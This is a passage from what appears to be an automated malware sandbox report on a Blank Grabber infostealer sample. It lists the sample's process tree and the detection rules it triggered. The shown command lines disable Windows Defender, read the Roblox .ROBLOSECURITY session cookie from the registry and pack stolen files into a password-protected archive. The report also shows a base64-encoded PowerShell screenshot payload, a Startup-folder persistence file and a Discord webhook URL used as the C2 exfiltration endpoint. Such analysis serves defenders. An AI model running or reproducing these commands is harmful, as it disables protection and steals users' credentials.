      • cmd.exe (PID: 1224 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 5584 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 6852 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7892 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 7808 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5980 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 3392 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1708 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5704 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7524 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8180 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7148 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7704 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2196 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8068 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 6 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", ProcessId: 7508, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7516, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", ProcessId: 8140, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 